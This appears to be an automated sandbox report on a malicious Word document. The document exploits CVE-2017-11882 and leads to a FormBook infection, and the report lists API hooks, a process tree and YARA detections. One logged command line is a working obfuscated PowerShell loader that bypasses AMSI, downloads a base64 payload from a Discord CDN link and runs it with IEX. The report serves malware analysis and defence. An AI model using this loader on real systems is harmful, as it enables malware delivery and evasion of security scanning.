                                      2021-12-02 17:36:08 UTC1839INData Raw: 4e 53 78 67 51 55 49 73 59 44 41 78 4c 47 42 46 52 43 78 67 4d 7a 45 73 59 44 45 31 4c 47 42 47 4d 79 78 67 51 6a 51 73 59 45 4e 43 4c 47 41 77 52 53 78 67 4d 7a 45 73 59 44 4a 43 4c 47 42 44 51 79 78 67 4f 54 41 73 59 45 59 34 4c 47 41 32 51 79 78 67 51 54 45 73 59 45 4a 43 4c 47 42 42 51 53 78 67 4f 45 4d 73 59 44 55 7a 4c 47 41 77 51 53 78 67 4d 44 49 73 59 44 63 77 4c 47 42 46 4e 43 78 67 4d 44 67 73 59 44 41 7a 4c 47 41 79 4f 43 78 67 4d 54 51 73 59 44 5a 43 4c 47 41 7a 4d 53 78 67 4e 6a 45 73 59 44 5a 46 4c 47 42 47 4d 79 78 67 52 55 55 73 59 44 6c 46 4c 47 41 31 4e 43 78 67 52 54 41 73 59 44 49 33 4c 47 42 47 4d 53 78 67 51 6a 59 73 59 44 4a 46 4c 47 41 31 51 69 78 67 4d 6a 51 73 59 44 55 79 4c 47 41 7a 51 53 78 67 4d 6b 51 73 59 45 56 45 4c 47 42
                                      Data Ascii: NSxgQUIsYDAxLGBFRCxgMzEsYDE1LGBGMyxgQjQsYENCLGAwRSxgMzEsYDJCLGBDQyxgOTAsYEY4LGA2QyxgQTEsYEJCLGBBQSxgOEMsYDUzLGAwQSxgMDIsYDcwLGBFNCxgMDgsYDAzLGAyOCxgMTQsYDZCLGAzMSxgNjEsYDZFLGBGMyxgRUUsYDlFLGA1NCxgRTAsYDI3LGBGMSxgQjYsYDJFLGA1QixgMjQsYDUyLGAzQSxgMkQsYEVELGB
                                      2021-12-02 17:36:08 UTC1855INData Raw: 4f 43 78 67 4d 6b 45 73 59 45 5a 44 4c 47 41 30 4f 53 78 67 52 6a 59 73 59 45 5a 46 4c 47 41 32 4d 53 78 67 4e 30 4d 73 59 45 51 31 4c 47 41 31 4e 53 78 67 52 54 63 73 59 45 4e 42 4c 47 41 79 4f 43 78 67 52 45 49 73 59 44 45 33 4c 47 42 46 52 43 78 67 4d 44 51 73 59 44 4d 79 4c 47 42 42 4d 69 78 67 4d 45 55 73 59 44 51 33 4c 47 41 79 4d 53 78 67 52 54 55 73 59 44 67 30 4c 47 42 47 52 53 78 67 4f 55 51 73 59 44 51 32 4c 47 41 32 51 53 78 67 51 55 4d 73 59 45 4d 77 4c 47 41 31 52 43 78 67 52 6a 41 73 59 44 68 47 4c 47 41 77 51 69 78 67 51 6a 67 73 59 44 4a 47 4c 47 42 42 4f 43 78 67 4d 6a 49 73 59 44 51 31 4c 47 41 35 51 53 78 67 51 30 55 73 59 45 56 46 4c 47 42 46 51 53 78 67 4f 44 67 73 59 44 4e 46 4c 47 41 30 4d 53 78 67 4d 54 59 73 59 44 6b 35 4c 47 41
                                      Data Ascii: OCxgMkEsYEZDLGA0OSxgRjYsYEZFLGA2MSxgN0MsYEQ1LGA1NSxgRTcsYENBLGAyOCxgREIsYDE3LGBFRCxgMDQsYDMyLGBBMixgMEUsYDQ3LGAyMSxgRTUsYDg0LGBGRSxgOUQsYDQ2LGA2QSxgQUMsYEMwLGA1RCxgRjAsYDhGLGAwQixgQjgsYDJGLGBBOCxgMjIsYDQ1LGA5QSxgQ0UsYEVFLGBFQSxgODgsYDNFLGA0MSxgMTYsYDk5LGA
                                      2021-12-02 17:36:08 UTC1871INData Raw: 51 69 78 67 51 7a 67 73 59 45 4e 47 4c 47 41 78 51 53 78 67 51 55 51 73 59 45 55 31 4c 47 42 46 52 53 78 67 4f 55 45 73 59 44 56 43 4c 47 41 35 4d 79 78 67 4d 30 45 73 59 44 52 46 4c 47 41 32 4d 69 78 67 4f 44 67 73 59 45 4d 32 4c 47 41 33 51 79 78 67 4d 7a 45 73 59 45 5a 43 4c 47 42 45 4f 43 78 67 4e 54 41 73 59 44 42 45 4c 47 41 79 4d 79 78 67 52 6a 4d 73 59 44 42 45 4c 47 41 79 4d 43 78 67 4d 7a 6b 73 59 45 56 44 4c 47 41 31 52 69 78 67 4e 6b 45 73 59 45 55 32 4c 47 41 79 4e 69 78 67 4e 6b 45 73 59 44 51 78 4c 47 42 45 4d 79 78 67 51 6b 55 73 59 44 6b 33 4c 47 42 43 52 53 78 67 51 54 59 73 59 44 41 78 4c 47 41 35 4e 69 78 67 4d 6a 55 73 59 44 64 43 4c 47 41 30 4e 43 78 67 4f 44 51 73 59 44 59 32 4c 47 41 30 52 53 78 67 52 6b 4d 73 59 44 5a 47 4c 47 41
                                      Data Ascii: QixgQzgsYENGLGAxQSxgQUQsYEU1LGBFRSxgOUEsYDVCLGA5MyxgM0EsYDRFLGA2MixgODgsYEM2LGA3QyxgMzEsYEZCLGBEOCxgNTAsYDBELGAyMyxgRjMsYDBELGAyMCxgMzksYEVDLGA1RixgNkEsYEU2LGAyNixgNkEsYDQxLGBEMyxgQkUsYDk3LGBCRSxgQTYsYDAxLGA5NixgMjUsYDdCLGA0NCxgODQsYDY2LGA0RSxgRkMsYDZGLGA


                                      Code Manipulations

                                      User Modules

                                      Hook Summary

                                      Function NameHook TypeActive in Processes
                                      PeekMessageAINLINEexplorer.exe
                                      PeekMessageWINLINEexplorer.exe
                                      GetMessageWINLINEexplorer.exe
                                      GetMessageAINLINEexplorer.exe

                                      Processes

                                      Process: explorer.exe, Module: USER32.dll
                                      Function NameHook TypeNew Data
                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE4
                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE4
                                      GetMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE4
                                      GetMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE4

                                      Statistics

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Start time:18:35:20
                                      Start date:02/12/2021
                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                      Imagebase:0x13fab0000
                                      File size:1423704 bytes
                                      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: rtf_cve2017_11882_ole, Description: Attempts to identify the exploit CVE 2017 11882, Source: 00000000.00000002.574618349.0000000005C40000.00000004.00000001.sdmp, Author: John Davison
                                      • Rule: rtf_cve2017_11882_ole, Description: Attempts to identify the exploit CVE 2017 11882, Source: 00000000.00000002.576020487.0000000006620000.00000004.00000001.sdmp, Author: John Davison
                                      Reputation:high

                                      General

                                      Start time:18:35:22
                                      Start date:02/12/2021
                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                      Imagebase:0x400000
                                      File size:543304 bytes
                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:18:35:23
                                      Start date:02/12/2021
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:CmD.exe /C cscript %tmp%\Client.vbs A C
                                      Imagebase:0x49f70000
                                      File size:302592 bytes
                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:18:35:23
                                      Start date:02/12/2021
                                      Path:C:\Windows\SysWOW64\cscript.exe
                                      Wow64 process (32bit):true
                                      Commandline:cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C
                                      Imagebase:0x1f0000
                                      File size:126976 bytes
                                      MD5 hash:A3A35EE79C64A640152B3113E6E254E2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      General

                                      Start time:18:35:24
                                      Start date:02/12/2021
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$0462662046266204626620462662046266204626620462662=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,57,49,53,51,52,55,56,52,53,55,53,50,55,48,53,49,48,57,47,57,49,53,55,57,57,56,48,48,55,52,48,52,54,50,54,54,50,47,109,111,110,111,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($0462662046266204626620462662046266204626620462662)|I`E`X
                                      Imagebase:0x13ff30000
                                      File size:473600 bytes
                                      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Reputation:high

                                      General

                                      Start time:18:35:58
                                      Start date:02/12/2021
                                      Path:C:\Windows\SysWOW64\calc.exe
                                      Wow64 process (32bit):true
                                      Commandline:{path}
                                      Imagebase:0xb80000
                                      File size:776192 bytes
                                      MD5 hash:60B7C0FEAD45F2066E5B805A91F4F0FC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.533047014.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.533047014.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.533047014.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.493675767.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.493675767.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.493675767.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.533315726.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.533315726.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.533315726.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.493359137.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.493359137.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.493359137.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.533246688.0000000000290000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.533246688.0000000000290000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.533246688.0000000000290000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:moderate

                                      General

                                      Start time:18:36:01
                                      Start date:02/12/2021
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Explorer.EXE
                                      Imagebase:0xffa10000
                                      File size:3229696 bytes
                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.510963723.0000000007F69000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.510963723.0000000007F69000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.510963723.0000000007F69000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.523205518.0000000007F69000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.523205518.0000000007F69000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.523205518.0000000007F69000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:high

                                      General

                                      Start time:18:36:14
                                      Start date:02/12/2021
                                      Path:C:\Windows\SysWOW64\cmmon32.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                      Imagebase:0x170000
                                      File size:43008 bytes
                                      MD5 hash:EA7BAAB0792C846DE451001FAE0FBD5F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.695505990.0000000000230000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.695505990.0000000000230000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.695505990.0000000000230000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.695460861.00000000001C0000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.695460861.00000000001C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.695460861.00000000001C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.695385145.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.695385145.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.695385145.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:moderate

                                      General

                                      Start time:18:36:19
                                      Start date:02/12/2021
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:/c del "C:\WINDOWS\syswow64\calc.exe"
                                      Imagebase:0x4a4d0000
                                      File size:302592 bytes
                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Disassembly

                                      Code Analysis

                                      Reset < >